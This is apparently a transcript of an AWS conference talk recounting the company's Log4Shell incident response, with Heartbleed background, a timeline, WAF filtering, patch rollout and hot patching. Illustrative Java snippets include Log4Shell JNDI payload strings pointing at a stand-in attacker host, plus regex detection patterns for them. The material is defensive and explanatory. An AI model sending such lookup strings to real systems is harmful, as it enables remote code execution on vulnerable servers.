When security, safety, and urgency all matter: Handling Log4Shell

Good morning. How's everybody doing? You're all very brave travelers for making it out to Caesars Forum on a Friday. Well, thanks for making it out. I hope everyone had a great re:Invent.

So I'm here to do something a little bit different today. We don't often do these kinds of talks, so hopefully it's the first of many.

My name is Abby, I'm a Senior Principal Security Engineer at AWS, and I mostly work on security for EC2 and friends. So EC2, EBS, API Gateway, and Amazon Linux.

On top of that, along with a handful of other security-minded senior engineers, I also work on a cross-AWS team that we call Ghostbusters. Ghostbusters is used as kind of a security big red button: we handle escalations, we help assess the impact of issues, we help SecOps (more on them in a second) figure out what the right path forward is with service teams, and we work with service teams on what an actual fix or mitigation might look like. So in events like Log4Shell, we often end up leading the response.

More on that in just a couple of seconds. I got really excited about animations this year, by the way, so we'll see if any of them actually work.

But before we get into Log4Shell, it's worth talking in slightly more general terms about how we think about events at AWS. Most event response, whether it's for a security issue or an operational issue, takes place on fancy conference calls. That ends up looking something like this: there's a TOSS call, the tech operations call, and that's focused, regardless of the event type, on mitigation and recovery.

Notice that you don't see root cause on there. We've covered that in a couple of other operational talks, but on the TOSS call you just focus on fixing the problem, you focus on immediate recovery. Generally we get to root cause a little bit later.

In parallel, there's a second call called the dashboard call, and I've called that the "everything else" call. That's focused on things like customer messaging or service health, so things like dashboard posts.

These conference calls are a little bit different than a regular work call. Event calls for operational events are run by call leaders. There's only one call leader at a time, and they're responsible for all of the tactical parts of the event: do we roll back a deployment, do we weigh traffic out of an Availability Zone?

These calls are also supported by a group called tech operations, which is where the TOSS call name comes from. They're responsible for event support: paging other teams and maintaining general order. If you work at a company like AWS, you've probably heard the "please mute your line while not actively speaking," right? The TOSS call folks are the ones making all of that happen in the background.

On a security call, things work just about the same way. Under ordinary circumstances, security response at AWS is mainly handled by Security Operations, so SecOps. These folks are global and staffed 24/7, so they follow the sun. Whenever you send a ticket to AWS Security, so to SecOps, you get someone who's awake during their daytime and on shift. It doesn't mean (and we'll get to that later too) that you won't end up paging in someone else, but you always start with someone who's awake during their own business hours and ready to be there.

What that looks like in the normal flow of events is something like this. You cut a ticket to SecOps, and at this point it's a potential security issue. Maybe you know something happened, maybe you know there was the potential for something to happen.

It could be cut by a service team, it could be a customer report, it could be automated through tooling. It doesn't matter where it comes from; that ticket gets triaged by SecOps, they look at it, and they engage escalations where they need to. In a lot of cases for security events, that might be someone like the Ghostbusters. Then SecOps engages a service team.

So the SecOps group and the service team work together. They align on what the actual risk might be in any given scenario, and they talk about urgency, proposed mitigations or fixes or deployments.

They work out things like customer communication: do we have to let customers know about something?

And then the service team is responsible for completing any of that mitigation, like getting a deployment out, engaging leadership, writing customer messaging. SecOps is responsible for driving that event through to completion. Did the action items get done? Did messaging get approved and then sent? Did the fix actually complete? Did we assign COEs?

One of the founding principles at AWS for how we handle events, operational or security or otherwise, is that they're serious until proven otherwise, and not the other way around. You assume that something is a big deal, and then if you can prove that it's not a big deal, you can downgrade. But otherwise, you treat everything like it's a big deal right up until you can prove that it's not.

And I think that's really important, particularly for security issues, because you get a lot of exercise of the process if you're treating everything like it's critical. So if something like Log4Shell does come along, it's a really well-trodden, well-exercised path. It's not scary.

It's just kind of "here's how we normally respond to events." I'm not going to go through the whole flowchart out loud, but this is roughly how we triage an event. It comes in, and you make a rough assessment of what the potential impact is. Is it nothing? Is it a false alarm?

Lots of tickets come through where it's "I saw on Hacker News that this package had an issue." Sometimes there's a really easy first step, which is: we don't use that package, and then it's done. And we want to verify that, right, you make sure that no one uses that package anywhere.

So sometimes there's a pretty easy first step where you can rule out how big of a deal that event might be. But when there's not, there's the second layer that you go through, and that's the "big deal until proven otherwise."

That might be paging in someone like Ghostbusters, that might be starting a TOSS call, that might be working with Builder Tools and the service teams to figure out what the blast radius of a library or a package might be. But generally, you can follow that same series of events for every single type of issue, whether it's a Log4Shell or kind of a false-alarm nothingburger.

Or an operational event: it comes in as a big deal, you see what you can weed out, you see what the actual real-life impact might be, and then you follow the steps accordingly. But sometimes things aren't quite normal circumstances. It doesn't mean the process doesn't apply, but it means that how we do it is a little bit different.

So if you take Log4Shell, or something like Log4Shell (we'll get into specifics in a second), Ghostbusters might run the event. It comes in through SecOps, or through a ticket, or through a customer report, the same way as anything else. But when you get to a point where SecOps says, you know what, I think there might actually be something here...

...Ghostbusters can often take over that TOSS call, take over running that event, until we're able to get a better sense of what the potential risk is. I think this is something that's really important about how we handle security issues, and I think it's the "putting our money where our mouth is" on treating everything like a big deal until proven otherwise.

Ghostbusters is a pretty heavy-hitting team to be running a TOSS call. It's mostly senior principals or distinguished engineers; there's a handful of principals on there.

But it's a big hammer, and having that group of folks coming in on a weekend or at 2 a.m. to lead a TOSS call is, I think, part of what backs up how seriously we take issues like this. We're putting some of our most senior security folks on the line to make sure that everything goes exactly the way that we want it to.

It's good for SecOps, because they get some backup for things like calling people at two o'clock when maybe those people aren't super excited to be called at two o'clock.

But it's good for all of us, because you're putting the heavy hitters behind how seriously we take a potential event.

Once Ghostbusters comes in to take over the TOSS call, things end up following the same general process, but there are a couple of different work streams that happen.

Once an event feels like it might still be a big deal, a certified big deal, we look at things like: is there a fix available? And if there's not, we start breaking off parallel work streams.

So folks work on building and testing a fix while other people work on assessing impact, or on trying to reproduce whatever the publicly reported issue was. And in parallel, we have folks working on coordinating the event itself.

That's paging in teams, trying to assess actual impact, and tracking progress once we start figuring out who might actually use an impacted package or library. And then there's a third parallel track, which is focused on communication.

That's like the dashboard call we spoke about a few minutes ago: what do we need to tell customers? Do we need to get security bulletins out? Do we need to get harbingers out, or Personal Health Dashboard notifications, the ones you see in your AWS account?

At some point, all of these threads end up converging. But being able to parallelize the response is really important, because it means progress on one component of the response isn't coming to a halt while you write messaging. You shouldn't be paused on progress for a fix, or on getting ready for deployments, while a dashboard notification gets written.

So Log4Shell, or even our hypothetical examples, they're not the first time we've had to respond really quickly, or the first time something's been an all-hands-on-deck sort of big deal.

Some of you might recognize the little logo that popped up at the bottom. Back in 2014, there was something called Heartbleed, and Heartbleed was a memory disclosure issue in OpenSSL.

This impacted a feature in OpenSSL called heartbeats. Heartbeats are for things like keep-alive, and they let a sender request a specific response from a receiver. The Heartbleed issue, though, would let you get back the payload plus whatever was in the memory buffer associated with the length you claimed for that response. There was no bounds verification. If you work on security issues, that's maybe an interesting flag for you: you're not checking how much memory should be returned against that length. And not verifying things leads to all kinds of really interesting issues; that was part of Log4Shell as well. Ultimately, Heartbleed let you send a request with a really large claimed length and get back the corresponding chunk of a memory buffer. And because this was memory that OpenSSL had used previously, you could get all kinds of fun stuff this way: private keys, usernames and passwords, certificates. Importantly, Heartbleed let you continue to hang out and eavesdrop on whatever your target was until both the bug was patched and all of the associated material had been rotated.

Simplified, though, Heartbleed ends up looking something like this. In my initial request, I might say "Hello, give me back this phrase 'Open Sesame' if you're listening," and I expect "Open Sesame" to be 10 characters long. In a normal TLS heartbeat request, the receiver is listening and it sends back "Open Sesame." With Heartbleed, I can say "Hello, say 'Open Sesame' if you're listening," and claim "Open Sesame" is 122 characters long. Which it's not (counting is hard on the Friday after re:Invent), but it's not 122 characters. And what I get back is "I'm listening: Open Sesame" and then whatever the next 122 characters were from memory. So in my case: "user beetle," "an administrator wants to set the server master key to admin," "user Eric wants to set the user password to hunter1."
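
To make that missing bounds check concrete, here's a toy sketch in Java rather than OpenSSL's actual C code; the "process memory" contents, names, and lengths are all made up for illustration. The vulnerable handler trusts the claimed length, while the fixed one compares it against the payload that actually arrived.

```java
import java.util.Arrays;

// Toy model of the Heartbleed bug: a heartbeat handler echoes back
// "claimedLength" bytes, and the vulnerable version never checks that
// the claim matches the payload it actually received.
public class HeartbeatDemo {

    // Stand-in for memory the TLS library previously used for other work.
    static byte[] processMemory =
            "OPEN SESAMEuser=eric;pass=hunter1;serverMasterKey=admin".getBytes();

    // Vulnerable: trusts the claimed length, so it leaks adjacent bytes.
    static byte[] respondVulnerable(int payloadOffset, int claimedLength) {
        return Arrays.copyOfRange(processMemory, payloadOffset,
                payloadOffset + claimedLength);
    }

    // Fixed: silently discard requests that claim more than was sent.
    static byte[] respondFixed(int payloadOffset, int payloadLength, int claimedLength) {
        if (claimedLength > payloadLength) {
            return new byte[0];
        }
        return Arrays.copyOfRange(processMemory, payloadOffset,
                payloadOffset + claimedLength);
    }

    public static void main(String[] args) {
        // The payload "OPEN SESAME" is 11 bytes, but the attacker claims 50.
        System.out.println(new String(respondVulnerable(0, 50)));        // leaks secrets
        System.out.println(new String(respondFixed(0, 11, 50)).isEmpty()); // true
    }
}
```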

And you'll notice from just this example (and this is simplified, but Heartbleed was simple): it was simple to use, it was simple to get back interesting things. And that's part of what made it such a mad scramble for folks on the internet.

For AWS, we had to hot patch. Ultimately it was a two-line fix, but millions of deployments. And we did this in hours, but at night. So at night, two-line fix, millions of deployments, and for the first time we scanned the entire Amazon EC2 IP space so we could send notification emails to every potentially impacted customer. If you've ever received an email like this, it is chaos, because we err on the side of "potentially" and not "definitively" impacted. Generally, when we're sending notifications to customers for things like this, we're saying, "Hey, there's something out here. It might be something that impacted you. Go ahead and look." We're indexing on how we can give people the earliest possible warning, even if it means it's a false positive.

For more info on Heartbleed, Colm MacCárthaigh did a tweet thread on the Heartbleed anniversary back in 2019 on how we handled the actual hot patching and deployments and customer messaging. That's on Twitter, so I recommend checking that one out if you have some follow-up questions.

But even Heartbleed, that's not the end of it. Over the last decade we've had an increasing number of mad dashes like this. What was unique about Heartbleed and the Log4j issue now known as Log4Shell, what was different about those, is that they were easy. They were easy to exploit, easy to take advantage of. There was no special microarchitectural knowledge required.

A lot of what we've seen in the last couple of years has been things like side channels, and those are not as easy to exploit. They generally require some amount of specific knowledge; it's fairly specialized, and it's generally not super easy to take advantage of things like microarchitectural side channels or timing side channels. Heartbleed and Log4Shell weren't like that. They were really easy.

There are some frequent flyers that we've spoken about a number of times, and I think those logos are probably familiar to a few folks sitting out here. But so far we've mostly covered just what the reactive part looks like: when a ticket comes in, or when a potential report comes in, how do we respond? There's a proactive element here too, both being able to know when something might be coming and being able to identify when something might be exploited.

The reactive part, I think, is often what's interesting. That's the event part; that's the "How did AWS handle Log4Shell?" part. But there is a proactive element too, because that proactive element is how we don't do this more often. I had fun responding to Log4j, but I'm not sure everyone wants to do that every week.

So the proactive element is just as important: can we predict when something can happen? More often than not, we think that we can, and a lot of that is just detective work. You're looking at a CVE feed, or a mailing list, or researcher reports, or papers that folks write for conferences; there are all kinds. But ultimately it's just poking around. It's reading reports, it's a feedback loop, it's seeing, "OK, I learned about this one thing two weeks ago and now this new report is out. Can I do anything with both of those? Does it go from being one not-that-exciting issue to a really exciting issue with the information I know now?"

A lot of the security teams call that pivoting. From the information that I have now, what else can I get? And if I can get information from step one, what can I use it for to find something at step two that maybe is a little bit more exciting?

Those different data sources are what makes things interesting long term. With something like Heartbleed or Log4Shell, can we figure out whether something was exploited? Some issues are harder; it's harder to tell whether there are any little breadcrumbs. One of the industry phrases for this is indicators of compromise, so IOCs. Can we find any breadcrumbs that something might have been taken advantage of?

And what's interesting for some of these bigger issues, side channels or Heartbleed or Log4j, is that it's not always really obvious. So you're putting together a lot of secondhand breadcrumbs as well.

So, to our friend Log4j. Before anything even kicks off, what was Log4j anyway? Why did this end up being such a big deal?

There are two characters here that I think are important for this conversation. The first is Log4j itself. Ultimately, it's a logging library for Java. Lots of people use it, and we'll get to that in a second. Log4j lets you log different levels of information from inside your application, and that could be something like user input or an HTTP request.

JNDI, the Java Naming and Directory Interface, is the other component in our cast of characters. It lets Java applications look up things like an object or a name at runtime, and there's some functionality for JNDI out of the box, like DNS or LDAP.
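
As a rough illustration of what a JNDI lookup looks like on its own, here's a minimal sketch; the LDAP server and the name being looked up are placeholders, not anything from the talk.

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

// Minimal JNDI sketch: resolve a name to an object at runtime through a
// pluggable provider (DNS, LDAP, RMI, ...). The URL is a made-up placeholder.
public class JndiExample {
    public static void main(String[] args) throws NamingException {
        Context ctx = new InitialContext();
        // Ask the named LDAP server for whatever object is bound to this name.
        Object obj = ctx.lookup("ldap://directory.example.com:389/cn=config");
        System.out.println(obj);
    }
}
```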

So Log4Shell. I think we now know a pretty solid timeline here, and if you're looking at it up on the very large screen, you might notice a couple of pieces that stick out. Notably, the initial report of the issue that led to Log4Shell was November 24th. A lot of folks had different responses here, but how many of you responded to Log4Shell on November 24th? Yeah. I think you'll see on the timeline, as well as in what happened in real life, that not a lot of folks were doing anything on November 24th. We were living a very different lifestyle.

We'll go through this whole timeline in just a second, but the place we want to start is November 24th. That's where our story picks up, and that's when Alibaba reports the very first Log4j issue, the one we now know as Log4Shell, to the Apache Foundation, the maintainers of Log4j.

And this is it, this is the first one. Basically, you can use parts of the JNDI tooling, the Java Naming and Directory Interface, and it doesn't control against input that you don't want. What that means in plainer terms is that if I can control log messages, or if I know what you're doing with the parameters passed as part of a logging message, I can use them to execute arbitrary code from wherever I am. So: remote code execution.

This is what that looks like, really simplified. I can use that JNDI lookup feature to execute code. I can pass things like an HTTP request that I know will get evaluated, so looked up, and then logged at runtime.
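
Roughly, the vulnerable pattern is something like the sketch below, assuming a log4j-core 2.x version from before the fixes; the class name, header, and attacker URL are purely illustrative.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// The application just logs a value it doesn't control; on vulnerable Log4j
// versions, the logging layer performs the ${jndi:...} lookup for the attacker.
public class LoginHandler {
    private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

    public void handle(String userAgentHeader) {
        // If userAgentHeader is "${jndi:ldap://attacker.example/a}", vulnerable
        // versions resolve that lookup at log time and can end up loading and
        // executing a remote class: remote code execution from a log line.
        LOG.info("Login attempt from client: {}", userAgentHeader);
    }
}
```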

Ultimately, what Log4Shell came down to is that those inputs weren't validated. I think a lot of folks have seen the "x = rm -rf /" joke, where it's like, "and I hope you've learned to sanitize your user inputs." No, we have not learned to sanitize our user inputs.

And ultimately, that's what this looks like: a lookup of something like a super secret key, and the JNDI lookup works exactly the same way. We've made a lot of tools in general for software that are there to make our lives easier, and that's things like remote lookups. I don't necessarily feel like remote lookups made my life easier in this case, but in general, for day-to-day development, they do.

So that's a little bit about what this looks like; that's what a remote lookup with a JNDI plugin would look like.

On November 29th, the Apache Foundation publishes the first and second fixes for that original issue reported by Alibaba. If you work on a lot of security issues, you'll notice that they look a lot like this in general. The fix, the commit message for the patch itself, is pretty boring. There are some trigger words in here if you read a lot of these, but it's basically saying, "Hey, don't worry about this. We just don't format lookups by default. No big deal, don't worry about it."

But from November 29th, when Apache published those fixes, until the first tweets started appearing on December 9th, it was pretty much under the radar. The fixes don't get a lot of attention. There was some activity, we now know, on some forums, most of which I could not read.

But these are pretty casual; you don't see a lot of attention. Where things start to pick up is December 9th, and for us that's Log4Shell day one. This is when everything kicks off. So here's what that looks like on the AWS side.

At around 7:40 Pacific time, the first Twitter mention of a potential Log4Shell pops up. This isn't ultimately the first first, but it's the first that picks up general publicity, general steam, and it catches people's attention for a couple of reasons.

One, it references an RCE, so remote code execution. And it doesn't specify a specific version of Log4j. Usually, if you write messaging for security issues, you want to scope it down as much as possible. This doesn't do that. It just says Log4j 2 (and we'll talk about that in a second), but it doesn't specify a point version, not something like Log4j 2.0.8. It just says Log4j 2. And we have bonus points here.

And the Log4j footprint is incredibly, incredibly wide. A lot of people have Log4j, and it's one of those things that's a little sneaky in that it's a dependency of a lot of other tools, so it's in a lot of places. At 7:40, when he sees this tweet, Marc Brooker cuts the first ticket to Ghostbusters, and it is pretty vague. This is the first one that we started running the event out of. There are a couple of others that we found a little bit later, from folks who had seen a forum post or had been sent a Slack message, but this is the first one that triggered the "this might be a five-alarm-fire sort of situation."

You can see this is from Marc's actual ticket: "I don't know any more about this than what the tweet says. If this is true, a Log4j RCE could be a pretty big deal." This is called foreshadowing. Thank you, Marc. And this is actually really important, because we don't actually know at this point if this is true, possible, anything. We don't know if this is a nothing; it could be anything at this point. We now know (more foreshadowing) that it was not a false alarm, but we treat these like they're a big deal until proven otherwise.

And I've already spoken with Marc about this: not a stellar security report, but we work with what we have. So at around 11, Colm notifies Steve. You'll notice that's a pretty short time window, from the first "we don't even know" ticket coming in to telling the most senior security person at Amazon. Really short window, right?

At about 3 p.m. Pacific time, there's the first formal briefing for the rest of AWS senior leadership. Ultimately, we ran these briefings twice a day for probably the first ten days of the Log4j response, which is expensive, by the way, especially on holidays. They don't love that. Guys, animations are awesome.

So at around 11:48 Pacific time again (I apologize to my coworkers who don't run on Pacific time, but it was the easiest for an in-person conversation, and I'm sure I'm going to get a lot of messages about it), so not long after that first ticket comes in, and just about 48 minutes after Colm tells Steve, our first set of mitigations rolls out. That's a couple of the ones we started with. This was even before we started to understand the full picture; these were proactive, and these were a big swing at "if this turns out to be a big deal, what can we stop before it becomes a big deal?"

This is a set of traffic filtering rules, and the goal here was to catch any potential exploit attempts, or what we thought an exploit attempt might look like. These are request-matching patterns that can be ingested by tools like WAF, so Web Application Firewall, and we ended up iterating on these rules and lists of patterns throughout the whole beginning of the response. But that's where we initially started.
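
These aren't AWS's actual rules, but a minimal sketch of the same idea might look like this: scan inbound request fields (headers, query strings, bodies) for strings that look like Log4j lookup attempts, including a couple of simple obfuscations. The patterns and names are illustrative only.

```java
import java.util.List;
import java.util.regex.Pattern;

// Illustrative request-matching filter in the spirit of the WAF rules
// described above: flag request fields that look like Log4Shell attempts.
public class Log4ShellRequestFilter {

    private static final List<Pattern> SUSPICIOUS = List.of(
            // Plain "${jndi:" lookups.
            Pattern.compile("\\$\\{jndi:", Pattern.CASE_INSENSITIVE),
            // Simple obfuscations such as "${${lower:j}ndi:".
            Pattern.compile("\\$\\{[^}]*(lower|upper|env|sys)[^}]*:j", Pattern.CASE_INSENSITIVE));

    public static boolean looksLikeExploitAttempt(String requestField) {
        return SUSPICIOUS.stream().anyMatch(p -> p.matcher(requestField).find());
    }

    public static void main(String[] args) {
        System.out.println(looksLikeExploitAttempt(
                "Mozilla/5.0 ${jndi:ldap://attacker.example/a}")); // true
        System.out.println(looksLikeExploitAttempt("Mozilla/5.0")); // false
    }
}
```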

At 1:22, Ghostbusters starts the first TOSS call. That's me. And by the way, that icon is what I use on my actual phone for TOSS, the little skull. I think that's nice; that's the right message. But that first call, the one we started on the very first day, doesn't stop for three days.

A little bit later that first day, Ryan Schmidt from Builder Tools proposes the first internal patch, and this just removes the JndiLookup class entirely, just blows the whole thing away. This is also foreshadowing. This was incredibly smart by Ryan, and it ended up paying off in big ways for us; it was really important for the rest of our response. Ryan made the assumption from the beginning that we almost always find new issues with an issue that's reported like this. It's never just the initial report. Someone always sees that little breadcrumb and says, "I should poke more at that, I should poke more at that, I should poke more at that," and before you know it you're fixing, hypothetically, four additional CVEs.
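
If you wanted to apply the same "just delete the class" idea to a jar you build yourself, a sketch might look like the following; the jar path and version are placeholders, and this is not the actual internal AWS patch.

```java
import java.net.URI;
import java.nio.file.FileSystem;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Map;

// Open log4j-core as a zip filesystem and remove the JndiLookup class,
// which is what the "blow the whole thing away" mitigation amounts to.
public class StripJndiLookup {
    public static void main(String[] args) throws Exception {
        URI jarUri = URI.create("jar:" + Paths.get("lib/log4j-core-2.14.1.jar").toUri());
        try (FileSystem zip = FileSystems.newFileSystem(jarUri, Map.of())) {
            boolean removed = Files.deleteIfExists(
                    zip.getPath("org/apache/logging/log4j/core/lookup/JndiLookup.class"));
            System.out.println("JndiLookup.class removed: " + removed);
        }
    }
}
```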

So we blew it away on the first day. Right about now we start doing our internal builds. The AWS fleets, for what it's worth, are very large, so this is a big process. At about 1:48, builds start, and we keep those same traffic filtering rules in place.

At around the same time on the TOSS call, we decide, well, we're here, we should also just go get v1. You'll notice that the original tweet just said v2. In the spirit of better safe than sorry, and just like disabling that entire class from the beginning, this also pays off. We decide to extend the mitigations to v1 and v2, even though at this point we have no indication that v1 is actually impacted.

We talked a little about this in the abstract, but typically event response follows a really standard pattern for AWS. The first step is mitigation: stop the bleeding. Can I prevent an issue from getting worse, or prevent new occurrences from happening? Second is detection: can I tell if this happens again? If someone can exploit this, will I know? Are there warning signs? Next is prevention: do I know what the root cause was? Can I close whatever gap led to this issue happening in the first place? And the very last step is cleanup: can I identify and fix any existing impact? Can I fix what's already happened?

At this point, we have our initial mitigations in place and we have a patch under review from Ryan, and it's time to look at what long-term detection looks like. That means our next question is: if there are attempts to leverage Log4Shell, can we catch them? And we think so.

So we spin off a handful of AWS security teams at this point to start looking at this, and this is roughly what that looks like, again at a really high level. First of all, our patches: do they catch everything? Do we even know what an exploit attempt would look like? Then, if we know what an exploit attempt looks like, if we know what an IOC is, can we use that as a pattern to find anything similar? And then you can pivot from there again and say: are there common IPs among the people trying to exploit this? Are they coming from the same place? Do they have something else in common, like formatting their attempts or requests in a similar way? Because you can often track those down to a central source: someone posted a proof of concept online, or posted a tool for trying to exploit Log4Shell.

What else do those IPs do? If they're trying to exploit Log4Shell, what else are they up to? And then you can keep feeding that cycle over and over and over again. This is one of the first branches off of that main call, and the work from this (I hope they do a talk on it at some point just on its own) ends up being incredibly cool. By the end of the initial period of event response, the tooling that was created on the fly on one of these offshoots of the main call had blocked over 2 billion attempts to leverage the Log4Shell issue against AWS services.
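
As a toy version of that pivot step, and nothing like the real tooling, you could imagine starting from requests that matched an exploit signature and grouping them by source IP to see whether attempts cluster around a few origins; the record type and sample data below are made up.

```java
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;

// Group matched exploit attempts by source IP so clusters (for example, one
// public proof-of-concept tool being reused) stand out for further pivoting.
public class IocPivot {
    record Attempt(String sourceIp, String requestField) {}

    static Map<String, Long> attemptsByIp(List<Attempt> matched) {
        return matched.stream()
                .collect(Collectors.groupingBy(Attempt::sourceIp, Collectors.counting()));
    }

    public static void main(String[] args) {
        var matched = List.of(
                new Attempt("203.0.113.7", "${jndi:ldap://attacker.example/a}"),
                new Attempt("203.0.113.7", "${jndi:ldap://attacker.example/b}"),
                new Attempt("198.51.100.2", "${${lower:j}ndi:ldap://x.example/c}"));
        attemptsByIp(matched).forEach((ip, n) -> System.out.println(ip + " -> " + n));
    }
}
```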

And the team is able to do this by working with things like internal Java profile data and a number of our existing threat intelligence sources, and it let us identify and proactively block traffic that might have potentially led to an exploit.

So at this point, we've got our mitigations in place, we've got our patch under review, we've got our detection happening, and we want to roll on to actual prevention. What can we do with the information that we have?

At around 3:30 we start mass deployment prep for AWS teams. This is with the built patch that we talked about from Ryan. Again, AWS is a large place, so these fleets are in the many, many millions, and building this many environments briefly gives the build system the hiccups.

In parallel, work starts on a campaign. Campaigns are what we call things like mass waves of tickets: how do we notify teams that there's an action they need to take, potentially an emergency? These tickets go straight to service on-calls, so people get paged, and the tickets instruct them that once patches are built, they need to work out getting deployments out to their services as quickly as possible.

This is the first of many, but this is a highlight of what the first campaign looked like. I've mentioned a couple of times that AWS is very big. What happens when you have to prioritize work across so many services? And some of you might remember that things at the holidays always have a little bit of an extra element to them: people are on vacation, people are traveling.

We can talk about this a little bit later too, and I think both Colm and David Yanacek have covered it in talks this week as well, but we also have things like change control. That's things like not pushing out a lot of deployments when people are trying to get their holiday shopping done. Hypothetically. So there's work that has to happen when we have to prioritize this much work across this many teams.

And it was really clear at this point that we'd blown away the whole class and we were going after v1 and v2. So the approach here is basically: you patch everything. Even if we don't think there's a chance this could actually be an issue, even if we think all of the other mitigations are sufficient, it doesn't matter. You have to patch anyway.

But there are some constraints; you can't just patch everything right out of the box. The first is people. We have limited people: people are on vacation, people are on holidays, people were on call for things like December availability. We can't take any availability risks even though we have to get a lot of work out for a potential security issue, and this is an evergreen bit of tension. You always have to weigh security versus availability.

So our thought process ends up looking something like this: we want to balance urgency with risk, so urgency with availability, or with what we think the potential impact for a service would be. In the first wave, we prioritize network-connected services that directly take customer input. We also prioritize things that have extremely large fleets, so things like EC2. We also prioritize services that we know take a little bit longer for deployments, so stateful services that have particularly strict durability requirements, like EBS. And we also prioritize, in that first wave, dependencies that are common between many services. If anyone's ever gotten a ticket to patch something or do work on a service, only to find out that one of the underlying dependencies hasn't been fixed yet, it's not a great experience. So we have to make sure we identify those dependencies early. That's the first wave.

Second, we go after network-connected services that don't directly take customer input, and container images and Lambda functions, or network-connected internal-only services. That leaves our third wave for non-network-connected services, and things like developer desktops, test environments, and not-very-common dependencies. This all helps control what the load on people and systems and services ends up looking like.

But just the coordination here is a massive effort. This means engaging tens of thousands of resources via tickets, and by "resource" I mean humans. Tens of thousands of tickets means you're paging tens of thousands of humans. That is tens of thousands of on-calls, people who were paged and woken up and asked to do work, and all of those folks are going to have questions.

So running a good campaign like this means also having good documentation. Are there clear, easy-to-follow directions for resolving the actual issue? That means: if I'm paged at 2 a.m., does that page say specifically what I need to do? Is it easy for me to follow if it's my first time, God bless me, on call for a service? Can I follow the instructions in that page? Is there a clear wiki? Is there a channel where I can go to get help? For most of this event, we ran a number of support channels that ended up being staffed by folks like Builder Tools, or SecOps, or Amazon Linux, or the JDK folks, and these channels were busy. This is not the peak of one of the channels; this is just when Abby remembered to take a screenshot. But this is a massive effort.

On top of the folks that you're engaging as on-calls, that means: who's working the support channels, who's staffing all the questions, who from Builder Tools is working at night in case the build system has an issue? At around 7 p.m., change control takes effect. To handle the volume of upcoming builds and deployments, we implement change control, and that basically stops all other builds and deployments to prioritize work for Log4j. Generally, that means you have to get pretty far up into senior leadership to get approval for anything that's not relevant, in this case to deploy anything that isn't Log4j work. And often change control means nothing: for a lot of change control, it means there are no deployments at all. In this case, it means only Log4j builds and deployments are going. We actually went in and stopped all of the other work; we stopped people's builds for them if they were not Log4j related. We're making a very conscious choice that this is important, and we are going to make sure that it is protected because it is important. So we'll go in and take action for folks.

At around 8 p.m., the team that's responding to the event, in this case Ghostbusters, starts to engage large teams directly, and this one is me. One of the benefits of having really distributed teams: Cape Town and Seattle are just about as far apart from each other as you could possibly get. We start contacting the large fleets. EC2 is still mostly split between Seattle and Cape Town; we have folks in Dublin, we have folks in New York, but the vast majority of the EC2 control plane services, things like RunInstances, what happens when you launch an EC2 instance, those folks are in Cape Town. So we take advantage of this, and we totally monopolize the build system during the Cape Town daytime, which is Seattle's nighttime. Ultimately, the vast, vast majority of Amazon EC2 services patch that first night while Seattle is asleep. December 10th. See, we're still only on the first day. Well, this is the second day now. It was a big day.

So, Log4Shell day two. A quick recap: Seattle comes back online the next morning, and at 2 a.m. Volker Simonis from the Corretto team had tweeted a Log4j hot patch. A hot patch, in this case, lets you patch a running JVM without a restart, so you patch in place. For posterity, that is the original tweet, and then the new permanent home of the hot patch, which ended up hanging out with everyone for quite some time.
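
Mechanically, a hot patch like that leans on the JVM's attach and instrumentation machinery. Here's a rough sketch of just the attach side, not the actual Log4jHotPatch code; the agent jar path is a made-up placeholder, and the agent itself (whose agentmain would use Instrumentation to retransform the vulnerable lookup class) isn't shown.

```java
import com.sun.tools.attach.VirtualMachine;
import com.sun.tools.attach.VirtualMachineDescriptor;

// Attach to every running JVM on the host and load a patching agent into it,
// so the fix lands without restarting the target processes.
public class AttachAgentToRunningJvms {
    public static void main(String[] args) throws Exception {
        for (VirtualMachineDescriptor vmd : VirtualMachine.list()) {
            VirtualMachine vm = VirtualMachine.attach(vmd);
            try {
                vm.loadAgent("/opt/patch/log4j-hotpatch-agent.jar");
                System.out.println("Loaded agent into JVM pid " + vmd.id());
            } finally {
                vm.detach();
            }
        }
    }
}
```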

And then the very first internal proposal. On the 10th, at around seven, the Seattle crew is back on shift. We worked all day on the 9th, a couple of us got a couple hours of sleep, and we're back online. We wake up both to the fact that Volker has tweeted his patch and to the fact that S3 has been testing in earnest to see what they can do with the live patch alongside the main one. At this point, we decide that we need to fork our efforts a little: we split off a group to look at what we can use this live patch for, in parallel to the regular patch, and we keep the existing group going on the main patch, the standard patch. So we're removing that whole class at this point. Folks who respond to security issues might have seen this too, but the stuff I do is easy. Responding to the initial security event, figuring out what's happening: that's easy. Everything else is hard.

There are so many pieces to responding to an event that are not the initial "oh my god, look at this CVE, it's rated 9.8." That stuff is easy. This stuff is hard, and it's things like: do we know how to report on progress? How can we tell when we're done? Have we gotten all the dependencies? Is the build system OK? Have we tested all of this? It's an incredible amount of unseen secondary work that goes on; the response doesn't stop at that first TOSS call.

At 11, we start the second wave of big deployments, and all non-Log4Shell builds and deployments are stopped, now for the second wave. And then, just like that diagram we just looked at, at around 11:30 on the 10th we get to the "we have a patch, now what?" stage of event response. AWS is big, so making things happen requires some special skills.

So at this point, we engage Laura. How do we get things moving in the right direction? How do we track dependencies and progress and blast radius? But you can't catch a breath, because at around 7 p.m. the second Log4j CVE drops. This says that some non-standard configurations are still vulnerable to an RCE if they use the JDBC Appender with LDAP. Basically, since we removed the JndiLookup class entirely, this was covered by our existing patch, so AWS is not impacted. At this point, we have our two parallel work streams going.

On the 11th, we start to look at rolling out that hot patch, the live patch from Volker, at the same time as the main patch. We've worked on this for a couple of hours at this point, and we think we have a safe strategy to roll out so many parallel deployments. At around 3 p.m., we start picking up speed. The way deployments work at AWS is that we never roll out to multiple regions at the same time; it's a safety mechanism. So by 11, we had started testing some regions, rolling out the hot patch in waves alongside the regular patch. By 3 p.m., we've seen that it's safe and that we don't see a big impact, and we've made it through multiple regions, so we start pushing the hot patch out in earnest.

And now that we have Laura on the job to help us figure out all of the hard things, like how we know when we're done, we start looking at things like stray dependencies, stray ECS tasks, and developer desktops. That ends up in our third wave of tickets, which at this point is mostly for ECS tasks. If you've run ECS before, tasks are what have the associated container definition: what's inside the container that I'm running on ECS, the Elastic Container Service.

